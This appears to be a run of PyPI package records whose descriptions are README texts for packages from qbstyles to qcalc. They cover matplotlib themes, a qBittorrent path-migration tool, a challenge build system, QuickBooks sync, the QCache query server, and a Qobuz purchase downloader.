Python package. To install it, simply run:pipinstallqbstylesHow do I use QB Styles?You can use the dark Matplotlib style theme in the following way:fromqbstylesimportmpl_stylempl_style(dark=True)And to use the light Matplotlib style theme, you can do the following:fromqbstylesimportmpl_stylempl_style(dark=False)How do I use QB Styles in Jupyter Notebooks?\u26a0\ufe0f Please make sure you runfrom qbstyles import mpl_styleandmpl_style()indifferent cellsas shown below. Seethis issuefor more details.# first cellfromqbstylesimportmpl_style# second cellmpl_style()What chart types can use QB Styles?Line plotsScatter plotsBubble plotsBar chartsPie chartsHistograms and distribution plots3D surface plotsStream plotsPolar plotsCan you show me a few examples?To run the examples inexample.ipynb, install the required packages usingpip install -r requirements_notebook.txtin a Python virtual environment of your choice.importmatplotlib.pyplotaspltfromqbstylesimportmpl_styledefplot(dark):mpl_style(dark)fig,axes=plt.subplots(2,2,figsize=(15,10))# the following functions are defined in example.ipynbline_plot(axes[0,0])scatter_plot(axes[0,1])distribution_plot(axes[1,0])ax=plt.subplot(2,2,4,projection='polar')polar_plot(ax)plot(dark=True)plot(dark=False)How do I create my own styles?Have a look at the filesqb-common.mplstyle,qb-dark.mplstyleandqb-light.mplstyle. They contain many elements that you may want to customise.To do so, create a file similar to the above files at the root of your project, and apply it after theqbstyleas follows:importmatplotlib.pyplotaspltfromqbstylesimportmpl_stylempl_style()plt.style.use('./your-style.mplstyle')All ofmatplotlibrc's options can be foundhere.What licence do you use?QB Styles is licensed under theApache 2.0 License."} +{"package": "qbt", "pacakge-description": "No description available on PyPI."} +{"package": "qbt_migrate", "pacakge-description": "qBt MigrateThis tool changes the paths of existing torrents in qBittorrent in a bulk fashion.\nIt can also convert slashes when migrating between Windows and Linux/Mac.Also check out my Chrome Extension for handling TV Episode torrents.qBt TV Torrent UploadChrome Web StoreSourceUsageALWAYSensure qBittorrent is closed before runningqbt_migrate.\nEither quit throughFile->Exit, task tray icon, or task manager for your system.Install from PyPi usingpip, or jump toExamplesfor Dockerpip install qbt_migrateRun the script and follow prompts or use CLI arguments with commandqbt_migrateusage: qbt_migrate [-h] [-e EXISTING_PATH] [-n NEW_PATH] [-r] [-t {Windows,Linux,Mac}] [-b BT_BACKUP_PATH] [-s] [-l {DEBUG,INFO}] [-v]\n\noptions:\n -h, --help show this help message and exit\n -e EXISTING_PATH, --existing-path EXISTING_PATH\n Existing root of path to look for.\n -n NEW_PATH, --new-path NEW_PATH\n New root path to replace existing root path with.\n -r, --regex Existing and New paths are regex patterns. (Capture groups recommended).\n -t {Windows,Linux,Mac}, --target-os {Windows,Linux,Mac}\n Target OS (converts slashes). Default will auto-detect if conversion is needed based on existing vs new.\n -b BT_BACKUP_PATH, --bt-backup-path BT_BACKUP_PATH\n BT_backup Path Override.\n -s, --skip-bad-files Skips bad .fastresume files instead of exiting. Default behavior is to exit.\n -l {DEBUG,INFO}, --log-level {DEBUG,INFO}\n Log Level, Default is INFO.\n -v, --version Prints the current version number and exits.By default, everything happens in the BT_backup directory defined by the OS the script is running on.\nOverrideBT_backuppath if needed.Default BT_backup paths:Windows:%LOCALAPPDATA%/qBittorrent/BT_backupLinux/Mac:$HOME/.local/share/data/qBittorrent/BT_backupDocker:/config/qBittorrent/BT_backupA backup zip archive is automatically created in theBT_backupdirectory.ExamplesAssuming all of our torrents are inX:\\Torrentswhen coming from Windows, or/torrentswhen coming from Linux/MacNOTE:When runningqbt_migrateon a Linux/Mac machine, Windows paths will require double\\. Ex.C:\\\\Users\\\\user\\\\Downloads\\\\TorrentsNOTE:Take note of trailing slash replacement when changing from Windows <-> Linux.-e X:\\ -n /torrentswill result in/torrentsxxxxx, not/torrents/xxxxx.\nThe correct pattern for this would be-e X: -n /torrentsor-e X:\\ -n /torrents/.qbt_migrate -e X:\\ -n Z:\\ -t Windows # Windows to Windows (Drive letter change)\nqbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\nqbt_migrate -e X:\\Torrents -n Z:\\NewDir\\Torrents -t Windows # Windows to Windows (Drive letter change with directory change)\nqbt_migrate -e X: -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths # Note Trailing Slash\nqbt_migrate -e X:\\Torrents -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\nqbt_migrate -e X:\\\\Torrents -n /torrents -t Linux # Windows to Linux/Mac (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\n\nqbt_migrate -e /torrents -n /new/path/for/torrents # Changes torrent root path on Linux/Mac\nqbt_migrate -e /torrents -n Z:\\Torrents -t Windows # Linux/Mac to Windows (converts slashes)\nqbt_migrate -e /torrents -n Z:\\\\Torrents -t Windows # Linux/Mac to Windows (converts slashes) # When running on Linux machine \\\\ is needed for Windows Paths\n\n# Adavanced Usage with RegEx\n# Example would replace /some/test/with/a/path with /test/matched/path\nqbt_migrate -r -e /some/(\\w+)/.*$ -n \\1/matched/path -t Linux # Matches using regex patterns and replaces using capture groups.\nqbt_migrate --regex -e /some/(\\w+)/.*$ -n \\1/matched/path -t Linux # Matches using regex patterns and replaces using capture groups.DockerYou can also run this tool with Docker if you don't have Python, or don't want to install the package to your system directly.\nThe BT_backup path is automatically overridden to/tmp/BT_backup, so mount yourBT_backupthere.NOTE:When runningqbt_migrateDocker image on a Linux/Mac machine, Windows paths will require double\\. Ex.C:\\\\Users\\\\user\\\\Downloads\\\\TorrentsThe Docker image has all functionality as the pip install, following the same arguments/patterns listed in the above examples.For example, mounting in the default BT_backup path on a Windows machine running Dockerdocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\ndocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\n...Mounting in the default BT_backup path on a Linux/Mac machine running Dockerdocker run -v $HOME/.local/share/data/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\ndocker run -v $HOME/.local/share/data/qBittorrent/BT_backup:/tmp/BT_backup jslay88/qbt_migrate -e X:\\Torrents -n X:\\NewDir\\Torrents -t Windows # Windows to Windows (Directory Change)\n...If for some reason you wanted to override BT_backup path from/tmp/BT_backupwithin the container, simply set\nenvironment variableBT_BACKUP_PATHon the container to where you will be mounting in.The-efor environment variable override must go before the imagejslay88/qbt_migrateas the-eafter the image is for--existing-pathdocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/opt/qbt_migrate/fastresume -e BT_BACKUP_PATH=/opt/qbt_migrate/fastresume jslay88/qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\n...You can also clone this repository, build the image, and run your own built imagedocker build . -t qbt_migrate\ndocker run -v %LOCALAPPDATA%/qBittorrent/BT_backup:/tmp/BT_backup qbt_migrate -e X:\\ -n Z:\\ # Windows to Windows (Drive letter change)\n...Python ModuleThis project has also been built to be modular and used as a Python Module. If you feel like utilizing this project within your own,\nplease feel free to do so, and let me know!Use Cases:UI for qbt_migrateFastResumeClassTorrent Manager"} +{"package": "qbuf", "pacakge-description": "UNKNOWN"} +{"package": "qbuffer", "pacakge-description": "No description available on PyPI."} +{"package": "qbuild", "pacakge-description": "qbuildis a build system for Quera technology challenges.InstallationFor installing qbuild, run the following command:$sudopipinstallqbuildChallenge Structurechallenge-name (git repo)\n\u251c\u2500\u2500 src\n\u2502 \u251c\u2500\u2500 [ ... source and test files ... ]\n\u2502 \u251c\u2500\u2500 .gitignore (optional)\n\u2502 \u251c\u2500\u2500 .qignore (optional)\n\u2502 \u251c\u2500\u2500 .qsolution (optional)\n\u2502 \u251c\u2500\u2500 .qtest (optional, BUT USUALLY NEEDED)\n\u2502 \u2514\u2500\u2500 .qrun.py (optional)\n\u251c\u2500\u2500 statement\n\u2502 \u251c\u2500\u2500 attachments\n\u2502 \u2502 \u2514\u2500\u2500 [ ... image files ... ]\n\u2502 \u2514\u2500\u2500 statement.md\n\u251c\u2500\u2500 .gitignore\n\u251c\u2500\u2500 README.md (generated from statement/statement.md, DO NOT EDIT)\n\u251c\u2500\u2500 tester_config.json\n\u2514\u2500\u2500 valid_filesCLI Usageqbuild: Build the challengeFirst,cdto the root of the challenge's git repository. Then runqbuildcommand. That's it!$cdGIT-REPO\n$qbuildForjupyterproblems if you need generate nonquera initial:$qbuild--jupyterFolderdistand fileREADME.mdwill be generated.\nIt creates folder.qbuildfor its internal work.\nDo not push it. Adddistand.qbuildto gitignore.qbuild diff$cdGIT-REPO\n$qbuilddiffThis command generates a diff betweeninitialandmodel_solutionexports.It's helpful for checking that things are set correctly.qbuild tree$qbuildtreepath/to/some/directoryUseqbuild treeto print the tree structure of a directory.Do notusetreecommand or anything else.qbuild --versionPrints currently installed version.FeaturesProblem Statementstatement\n\u251c\u2500\u2500 attachments\n\u2502 \u251c\u2500\u2500 image1.png\n\u2502 \u2514\u2500\u2500 image2.png\n\u2514\u2500\u2500 statement.mdstatement.mdis a Jinja2 template and must inheritstatement_base.md.\nYou can use variableshas_initial,initial_structure,solution_structure.{% extends \"statement_base.md\" %}\n\n{% block name %}Problem Name{% endblock %}\n\n{% block readme %}\n... extra info about problem ...\n{% endblock readme %}\n\n{% block intro %}\n... intro ...\n![Image 1](attachments/image1.png)\n{% endblock intro %}\n\n{% block details %}\n... details ...\n{% endblock details %}\n\n{% block notes %}\n... notes ...\n```\n{{ solution_structure }}\n```\n{% endblock notes %}Ignore files:.qignore,.qsolution,.qtest,.qsampletestThese files must be at the root ofsrcfolder.\nTheir syntax is like gitignore.\nYou can specify test files in.qtestYou can specify sample test files in.qsampletest. This files just hide inmodel_solutionexport.\nand solution files in.qsolution.\nFiles ignored by.qignorewill be removed in all exports.Warning:.qhideis deprecated and is replaced by.qsolution.Replacement Rules: Comment Directives// _q_solution_begin\n ... Part of Solution ...\n// _q_end\n\n// _q_test_begin\n ... Part of Test ...\n// _q_endThey can also have areplaceblock:// _q_solution_begin\n ... Part of Solution ...\n// _q_replace\n// ... This will be uncommented & replaced ...\n// _q_end\n\n/* _q_test_begin */\n ... Part of Test ...\n/* _q_replace */\n/* ... This will be uncommented & replaced ... */\n/* _q_end */Any one-line comment syntax is supported.Comments in each block should follow the same syntax.\ne.g. You can't mix// ...and/* ... */.Warning: These directives are depricated:_q_hide_from_users_begin: replaced by_q_solution_begin_q_hide_from_users_end: replaced by_q_endReplacement Rules:.nosolution,.notestWhen comment directives can't help...src/path/to/some/file.js\nsrc/path/to/some/file.nosolution.js (`file.js` without solution)\n\nsrc/path/to/some/file.js\nsrc/path/to/some/file.notest.js (`file.js` without test)Warning:.initialis deprecated and is replaced by.nosolution.Build hook:.qrun.py.qrun.pymust be at the root ofsrc.qbuildruns.qrun.pyin each export.Arguments passed to.qrun.py:--hide-solution: If passed, current export shouldn't contain solutions.--hide-test: If passed, current export shouldn't contain tests.Use.qrun.pyonly if other features are not enough."} +{"package": "qbuilder", "pacakge-description": "# QuerybuilderA module to build human readable SQL query string and then optionally convert them towhere()caluse expressions for [Peewee](http://peewee-orm.com).`python from querybuilder import Field as F, AND, OR query =OR(AND(F('pageviews')>= 10000,F('author_ids').contains(7,8,9)))`"} +{"package": "qbuki", "pacakge-description": "No description available on PyPI."} +{"package": "qbuspy", "pacakge-description": "qbuspy"} +{"package": "qbwc", "pacakge-description": "## QBWC: Quickbooks Desktop WebconnectorExperimentalDjango package for syncing data between django application and\nQuickBooks Desktop via the Quickbooks Webconnector (QBWC).Implementation includes transfer services (push, pull, re-sync) for:gl accountsother name listexpenses (credit card charges)customerscredit cardsvendorsRoad map:vendor billsjournal entriesQuickBooks Reports## InstallationInstall the latest development version from github using:` pip installgit+https://github.com/bill-ash/qbwc`or from pypi:` pip install qbwc `## ExampleExample directory includes application with sample apps for each of the entites mentioned above.Repeated patterns will be abstracted in theBaseObjectMixinmodel and are likely to change."} +{"package": "qbwrap", "pacakge-description": "QBwrapQuick Bubblewrap chroot management tool.AboutQBwrap is a tool that allows for quick bwrap chroot management with toml\nconfiguration files.SampleA sample QBwrap configuration file might look something like this:[core]location=\"/chroots/my-chroot\"hostname=\"test\"process=\"bash -l\"[mount]rw=[[\"/chroots/my-chroot\",\"/\"],]ro=[\"/etc/resolv.conf\",]dev=[\"/dev\",]proc=[\"/proc\",]tmpfs=[[\"/dev/shm\",{}],[\"/tmp\",{perms=\"1777\"}],]DocumentationDocumentation can either be built locally or browsed online onGitLab pages.Command-line interfaceUsageqbwrap [-h] [-V] [-q] [-f] [-r]\n [-R ROOT_METHOD] [-S DEV_SIZE] [-e EXECUTABLE] [-p PROCESS] [-m MERGE]\n [-P COLLECTION_PATH]\n [-c {default,always,never}]\n [--no-setup] [--force-setup]\n qbwrap_filePositional argumentsqbwrap_file path to the QBwrap config fileOptions-h, --help show this help message and exit\n -V, --version show program's version number and exit\n -q, --quiet be quiet, limit information output\n -f, --fake do not actually call bwrap\n -r, --root call bwrap as root\n -R ROOT_METHOD, --root-method ROOT_METHOD\n which method to use to become root\n -S DEV_SIZE, --dev-size DEV_SIZE\n default size for special devices, eg. tmpfs\n -e EXECUTABLE, --executable EXECUTABLE\n bubblewrap executable to call, defaults to \"bwrap\"\n -p PROCESS, --process PROCESS\n override process command to start inside bwrap chroot\n -m MERGE, --merge MERGE\n override any stanza of given QBwrap config\n -P COLLECTION_PATH, --collection-path COLLECTION_PATH\n overwrite path of the QBwrap collection\n -c {default,always,never}, --use-collection {default,always,never}\n whether and how to use the QBwrap collection\n --no-setup do not run setup (from the setup stanza) even if required\n --force-setup force to run setup defined in the setup stanzaInstallationPyPiAvailable atpypi.org/project/qbwrap.pipinstall--user--break-system-packagesqbwrapRepositorySee instructions in thexgqt-python-app-qbwraprepository'sREADME.mdfile."} +{"package": "qbx", "pacakge-description": "No description available on PyPI."} +{"package": "qbz95", "pacakge-description": "\u8fd9\u662f\u4e00\u4e2a\u673a\u5668\u5b66\u4e60\u5e93\uff0c\u91cc\u9762\u6574\u5408\u4e86\u4ee5\u4e0b\u5185\u5bb9\uff1a\u5e38\u7528\u7b97\u6cd5\u7684\u4f7f\u7528\u548c\u5b9e\u9a8c\u5e38\u7528\u6570\u636e\u83b7\u53d6\u548c\u6570\u636e\u5904\u7406\u81ea\u5df1\u5199\u7684\u7b97\u6cd5\u548c\u5b9e\u9a8c\u867d\u7136\u5b66\u4e60\u673a\u5668\u5b66\u4e60\u597d\u51e0\u5e74\uff0c\u53c2\u4e0e\u7684\u9879\u76ee\u4e5f\u4e0d\u5c11\uff0c\u5c1d\u8bd5\u7684\u7b97\u6cd5\u4e5f\u5f88\u591a\uff0c\u4f46\u6bcf\u6b21\u78b0\u5230\u65b0\u7684\u95ee\u9898\uff0c\u5f88\u591a\u4ee3\u7801\u8fd8\u8981\u5bfb\u627e\uff0c\u4e00\u4e9b\u5b9e\u9a8c\u8fd8\u9700\u8981\u4fee\u6539\u624d\u80fd\u91cd\u73b0\uff0c\u8fd9\u6837\u601d\u8def\u5f88\u5bb9\u6613\u88ab\u6253\u65ad\u3002\n\u521b\u5efa\u8fd9\u4e2a\u673a\u5668\u5b66\u4e60\u5e93\u7684\u76ee\u7684\u5728\u4e8e\uff0c\u63d0\u9ad8\u6a21\u578b\u521b\u5efa\u7684\u6548\u7387\uff0c\u5f53\u4e00\u4e2a\u65b0\u7684\u95ee\u9898\u6765\uff0c\u53ef\u4ee5\u5f88\u5feb\u7684\u7528\u5df2\u6709\u7684\u65b9\u6cd5\u8fdb\u884c\u9a8c\u8bc1\uff0c\u4ece\u800c\u627e\u5230\u65b9\u5411\u3002"} +{"package": "qbzstoredl", "pacakge-description": "Downloader for music from the Qobuz download storeQobuz recently discontinued support for tarball downloads.\nInstead, you now have to use their Qobuz Downloader app that is not available on Linux.\nSince the Downloader app never worked for me anyway and I like to use Linux, I have made this script to act as a replacement for the Downloader on Linux.InstallationPrerequisites:Python 3.11 (other versions might also work, not tested)poetryffmpegFrom pippip install qbzstoredl\nqbzstoredl --register pipFrom gitgit clone https://gitlab.com/pkerling/qbzstoredl.git\ncd qbzstoredl\npoetry install\npoetry run qbzstoredl --register poetryMIME handlerThe last step registers an URL handler for theqbzdlscheme that is used by the official downloader and allows any browser to just launch the script from the normal Qobuz download page.\nBe aware that it will not work any more and you need to rerunqbzstoredl --registerif you move the directory containing this repository.UsageLog in to Qobuz in your browser.Go to \"My purchases\" or open a download link from a successful purchase email.Click \"Download with Qobuz Downloader\".Click \"Open\" in the popup.Depending on your browser, allow the URL to be opened with qbzstoredl.Watch as the music is being downloaded to theoutfolder.Manual usageOn the Qobuz download page, note the URL starting withqbzdl://resulting from the click on \"Open\" in the download popup.\nYou can use it on the terminal like this:poetry run qbzstoredl qbzdl://...NotesAs far as I could tell, the Downloader always downloads the FLAC version of the tracks.\nIf MP3 is desired, it is converted on the user's PC, so this is what this script also does.I have tested this only with a few albums in my own collection, which exclusively contains CD quality albums, so YMMV.\nFeel free to report problems, but I will likely not be able to help without theqbzdl://URL for the download, which you can send me privately."} +{"package": "qc", "pacakge-description": "UNKNOWN"} +{"package": "qc2champ", "pacakge-description": "qc2champ is a Python library that connverts outputs from various\nquantum chemical calculations to CHAMP input files. It relies on cclib\nfor parsers."} +{"package": "qc2tsv", "pacakge-description": "https://github.com/ENCODE-DCC/qc2tsv"} +{"package": "qc3", "pacakge-description": "No description available on PyPI."} +{"package": "qcache", "pacakge-description": "QCache is a key-table cache, an in memory cache server with analytical query capabilities.While the more commonly known key-value caches (such asMemcached) lets you fetch a value\nbased on a key QCache lets you run queries against a table based on a key.MotivationYou are working with table data that you want to run flexible queries against but do not want to\nload them into an SQL database or similar because of any of the following:The operational cost and complexity of bringing in an SQL serverThe tables do not have a homogeneous formatThe data is short livedNot all data available is ever used, you only want to use resources on demandYou want to treat queries as data and build them dynamically using data structures\nthat you are used to (dictionaries and lists or objects and arrays depending on your\nlanguage background)Expensive JOINs are required to create the table.\u2026Or, you are building server software and want to add the possibility for your clients to run\nqueries directly against the data without the need for dreadful translations between a REST\ninterface with some home grown filter language.FeaturesSimple, single thread, single process, server.Expressive JSON-based query language with format and features similar to SQL SELECT. Queries\nare data that can easily be transformed or enriched.Support for JSON or CSV input and output formatPerformant queries on tables as large as 10 x 1000000 cells out of the boxNo need for table definitions, tables are created dynamically based on the data insertedStatistics about hit and miss count, query and insert performance and more available\nthrough HTTP APIScales linearly in query capacity with the number of servers. A python client library that\nuses consistent hashing for key distribution among servers is available\nhereQCache-client. There\u2019s also a basic Go client hereGo-QCache-client.\nMore clients are welcome!RequirementsPython 2.7 (2.7.9+ if using TLS) for nowInstallationpip install qcacheRunningqcacheThis will start qcache on the default port using the default cache size. To get help on available parameters:qcache --helpDockerYou can also get the latest version as a Docker image. This is probably the easiest way to try it out if you\nare running Linux or if you have Docker Machine installed.docker run -p 9401:9401 tobgu/qcacheLicenseMIT licensed. See the bundledLICENSEfile for more details.Query examplesBelow are examples of the major features of the query language. A JSON object is used to\ndescribe the query. The query should be URL encoded and passed in using the \u2018q\u2019 GET-parameter.The query language uses LISP-style prefix notation for simplicity. This makes it easy\nto parse and build queries dynamically since no rules for operator precedence\never need to be applied.Like so:http://localhost:8888/qcache/datasets/?q=You can also POST queries as JSON against:http://localhost:8888/qcache/datasets//q/This is a good alternative to GET if your queries are too large to fit in the query string.Select allAn empty object will return all rows in the table:{}Projection{\"select\":[\"foo\",\"bar\"]}Not specifying select is equivalent to SELECT * in SQLColumn aliasing{\"select\":[[\"=\",\"foo\",\"bar\"]]}This will rename column bar to foo in the result.You can also make more elaborate calculations in the aliasing expression.{\"select\":[[\"=\",\"baz\",[\"+\",[\"*\",\"bar\",2],\"foo\"]]]As well as simple constant assignments.{\"select\":[[\"=\",\"baz\",55]]}FilteringComparison{\"where\":[\"<\",\"foo\",1]}The following operators are supported:==, !=, <=, <, >, >=In{\"where\":[\"in\",\"foo\",[1,2]]}Like/ilikeLike and ilike are used for string matching and work similar to LIKE in SQL. Like is case sensitive\nwhile ilike is case insensitive. In addition to string matching using % as wildcard like/ilike also\nsupports regexps.{\"where\":[\"like\",\"foo\",\"'%bar%'\"]}Bitwise operatorsThere are two operators for bitwise filtering on integers:all_bitsandany_bits.all_bits - evaluates to true if all bits in the supplied argument are set in value tested against.any_bits - evaluates to true if any bits in the supplied argument are set in value tested agains.{\"where\":[\"any_bits\",\"foo\",31]}Clauses{\"where\":[\"&\",[\">\",\"foo\",1],[\"==\",\"bar\",2]]}The following operators are supported:&, |Negation{\"where\":[\"!\",[\"==\",\"foo\",1]]}OrderingAscending{\"order_by\":[\"foo\"]}Descending{\"order_by\":[\"-foo\"]}OffsetGreat for pagination of long results!{\"offset\":5}LimitGreat for pagination of long results!{\"limit\":10}Group by{\"group_by\":[\"foo\"]}AggregationAggregation is done as part of the select, just like in SQL.{\"select\":[\"foo\"[\"sum\",\"bar\"]],\"group_by\":[\"foo\"]}DistinctDistinct has its own query clause unlike in SQL.{\"select\":[\"foo\",\"bar\"],\"distinct\":[\"foo\"]}Sub queries using fromFilter, transform and select your data in multiple steps.{\"select\":[[\"=\",\"foo_pct\",[\"*\",100,[\"/\",\"foo\",\"bar\"]]]],\"from\":{\"select\":[\"foo\",[\"sum\",\"bar\"]],\"group_by\":[\"foo\"]}}Sub queries using inFilter your data using the result of a query as filter input.{\"where\",[\"in\",\"foo\",{\"where\":[\"==\",\"bar\",10]}]}All together now!A slightly more elaborate example. Get the top 10 foo:s with most bar:s.{\"select\":[\"foo\",[\"sum\",\"bar\"]],\"where\":[\">\",\"bar\",0],\"order_by\":[\"-bar\"],\"group_by\":[\"foo\"],\"limit\":10}API examples using curlUpload table data to cache (a 404 will be returned if querying on a key that does not exist).curl -X POST --data-binary @my_csv.csv http://localhost:8888/qcache/dataset/my-keyQuery tablecurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"count\\\"]], \\\"where\\\": [\\\"<\\\", \\\"baz\\\", 99999999999915], \\\"offset\\\": 100, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"count\\\"]], \\\"where\\\": [\\\"in\\\", \\\"baz\\\", [779889,8958854,8281368,6836605,3080972,4072649,7173075,4769116,4766900,4947128,7314959,683531,6395813,7834211,12051932,3735224,12368089,9858334,4424629,4155280]], \\\"offset\\\": 0, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"where\\\": [\\\"==\\\", \\\"foo\\\", \\\"\\\\\\\"95d9f671\\\\\\\"\\\"], \\\"offset\\\": 0, \\\"limit\\\": 50}\"\ncurl -G localhost:8888/qcache/dataset/my-key --data-urlencode \"q={\\\"select\\\": [[\\\"max\\\", \\\"baz\\\"]], \\\"offset\\\": 0, \\\"limit\\\": 500000000000}\"Custom request HTTP headersThere are a couple of custom HTTP headers that can be used to control the behaviour of Q-Cache.Posting tablesX-QCache-typesQCache will usually recognize the data types of submitted data automatically. There may be times when\nstrings are mistaken for numbers because all of the data submitted for a column in a dataset happens\nto be in numbers.This header makes it possible to explicitly type column to be a string to. In the example below columns\nfoo and bar are both typed to string.X-QCache-types: foo=string;bar=stringExplicitly setting the type to string is only relevant when submitting data in CSV. With JSON the data\nhas an unambiguous (well\u2026) data type that is used by QCache.EnumsTheX-QCache-typesheader can also be used to specify columns with enum types.X-QCache-types: foo=enum;bar=enumEnums are a good way to store low cardinality string columns space efficiently. They can be compared\nfor equality and inequality but currently do not have a well defined order so filtering by\nlarger than and less than is not possible for example.X-QCache-stand-in-columnsIt may be that your submitted data varies a little from dataset to dataset with respect to the columns\navailable in the dataset. You still want to be able to query the datasets in the same way and make\nsome assumptions of which columns that are available. This header lets you do that.In the below example column foo will be set to 10 in case it does not exist in the submitted data. bar will\nbe set to the value of the baz column if it is not submitted.This header can be used in request both for storing and querying data.X-QCache-stand-in-columns: foo=10;bar=bazQuery responsesX-QCache-unsliced-lengthThis header is added to responses and states how many rows the total filtered result was before applying\nany limits or offsets for pagination.X-QCache-unsliced-length: 8324More examplesPlease look at the tests in the project orQCache-clientfor some further examples of queries.\nThe unit tests in this project is also a good source for examples.If you still have questions don\u2019t hesitate to contact the author or write an issue!Statisticshttp://localhost:8888/qcache/statisticsA get against the above endpoint will return a JSON object containing cache statistics,\nhit & miss count, query & upload duration. Statistics are reset when querying.Data encodingJust use UTF-8 when uploading data and in queries and you\u2019ll be fine. All responses are UTF-8.\nNo other codecs are supported.Data compressionQCache supports request and response body compression with LZ4 or GZIP using standard HTTP headers.In a query request set the following header to receive a compressed response:Accept-Encoding: lz4,gzipThe response will contain the following header indicating the used encodingContent-Encoding: lz4LZ4 will always be preferred if present.The above header should also be set indicating the compression algorithm if you are\nsubmitting compressed data.Performance & dimensioningSince QCache is single thread, single process, the way to scale capacity is by adding more servers.\nIf you have 8 Gb of ram available on a 4 core machine don\u2019t start one server using all 8 Gb. Instead\nstart 4 servers with 2 Gb memory each or even 8 servers with 1 Gb each or 16 servers with 512 Mb each.\ndepending on your use case. Assign them to different ports and use a client library to do the key\nbalancing between them. That way you will have 4 - 16 times the query capacity.QCache is ideal for container deployment. Start one container running one QCache instance.Expect a memory overhead of about 20% - 30% of the configured cache size for querying and table loading.\nTo be on the safe side you should probably assume a 50% overhead. Eg. if you have 3 Gb available set the\ncache size to 2 Gb.When choosing between CSV and JSON as upload format prefer CSV as the amount of data can be large and it\u2019s\nmore compact and faster to insert than JSON.For query responses prefer JSON as the amount of data is often small and it\u2019s easier to work with than CSV.Standing on the shoulders of giantsQCache makes heavy use of the fantastic python librariesPandas,NumPyandTornado.Ideas for coming workThese may or may not be realized, it\u2019s far from sure that all of the ideas are good.Improve documentationStream data into dataframe rather than waiting for complete input, chunked HTTP upload or similar.Streaming proxy to allow clients to only know about one endpoint.Configurable URL prefix to allow being mounted at arbitrary position behind a proxy.Make it possible to execute multiple queries and return multiple responses in one request (qs=,/qs/).Allow post with data and query in one request, this will guarantee progress\nas long as the dataset fits in memory. {\u201cquery\u201d: \u2026, \u201cdataset\u201d: \u2026}Possibility to specify indexes when uploading data (how do the indexes affect size? write performance? read performance?)Possibility to upload files as a way to prime the cache without taking up memory.Namespaces for more diverse statistics based on namespace?Publish performance numbersOther table formats in addition to CSV and JSON?Break out all things dataframe into an own package and provide possibility to update\nand insert into dataframe based on predicate just like querying is done now.Investigate type hints for pandas categorials on enum-like values to improve storage\nlayout and filter speed. Check new import options from CSV when Pandas 0.19 is available.Support math functions as part of the where clause (see pandas expr.py/ops.py)Some kind of light weight joining? Could create dataset groups that all are allocated to\nthe same cache. Sub queries could then be used to query datasets based on data selected\nfrom other datasets in the same dataset group.ContributingWant to contribute? That\u2019s great!If you experience problems please log them on GitHub. If you want to contribute code,\nplease fork the code and submit a pull request.If you intend to implement major features or make major changes please raise an issue\nso that we can discuss it first.Running testspip install -r dev-requirements.txt\ninvoke testTLSSome tests rely on a couple of certs found undertls/. If these have expired\nthey have to be regenerated. This is done by executinggenerate_test_certs.shfrom thetlsdirectory."} +{"package": "qcache-client", "pacakge-description": "Python client library forQCache. Uses consistent hashing to distribute data over multiple nodes.Installationpip install qcache-clientDocumentationAvailable athttp://qcache-client.readthedocs.org/en/latest/.Please see the tests in test_qclient.py for examples of how to use it.ContributingWant to contribute? That\u2019s great!If you experience problems please log them on GitHub. If you want to contribute code,\nplease fork the code and submit a pull request.If you intend to implement major features or make major changes please raise an issue\nso that we can discuss it first.Running testsThe tests requires that you have docker installed since they are executed against a QCache instance running\nin a docker container.pip install -r dev-requirements.txt\ninvoke testTODOAsync interface?Changelog0.5.1 (2019-01-06)Include response content in cases of unexpected responses for easier debugging.Expose \u201ctrust_env\u201d as a client constructor parameter to improve performance.0.5.0 (2017-01-08)Support TLS client certificate verification0.4.2 (2016-12-18)Check dropped nodes also on get, not only post.Make connection stats public and resettable.0.4.1 (2016-11-11)Include content encoding in the result object.0.4.0 (2016-09-18)Support for custom headers when running queries. This allows use of the pandas filter engine\nintroduced in QCache 0.6.1.0.3.2 (2016-04-10)Support Python 3.4 and 3.5.0.3.1 (2016-01-16)Include CHANGELOG in release.0.3.0 (2015-12-23)Possible to query using POST instead of GET. Good for very large queries.Additional circuit breakers to avoid infinite repetition of requests in case of errors.0.2.1 (2015-12-14)SSL and basic auth supportPossible to add custom headers when posting data, type information for example0.2.0 (2015-12-06)Report the unsliced result length as part of the result, nice for pagination for exampleUse connection pooling0.1.0 (2015-10-25)First release that actually does something sensible.0.0.1 (2015-10-15)First release on PyPI."} +{"package": "qcad", "pacakge-description": "WHIKoperator - \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u043a\u0430\u043c\u0435\u0440\u043e\u0439 HV \u0432 Gravity-core"} +{"package": "qcalc", "pacakge-description": "\"qcalc\" is a powerful, cross-platform calculator specifically designed for\nembedded systems programmers. The calculator accepts whole expressions in\ntheC-syntaxand displays results simultaneously in decimal, hexadecimal,\nand binary without the need to explicitly convert the result to these bases.General RequirementsThe \"qcalc\" package requires Python 3, which is included in theQTools distributionfor Windows and is typically included with other operating systems, such as\nLinux and MacOS.InstallationTheqcalc.pyscript can be used standalone,withoutany\ninstallation (see Using \"qcalc\" below).Alternatively, you caninstallqcalc.pywithpipfrom PyPi by\nexecuting the following command:pip install qcalcOr directly from the sources directory (e.g.,/qp/qtools/qcalc):python setup.py install --install-dir=/qp/qtools/qcalcUsing \"qcalc\"If you are 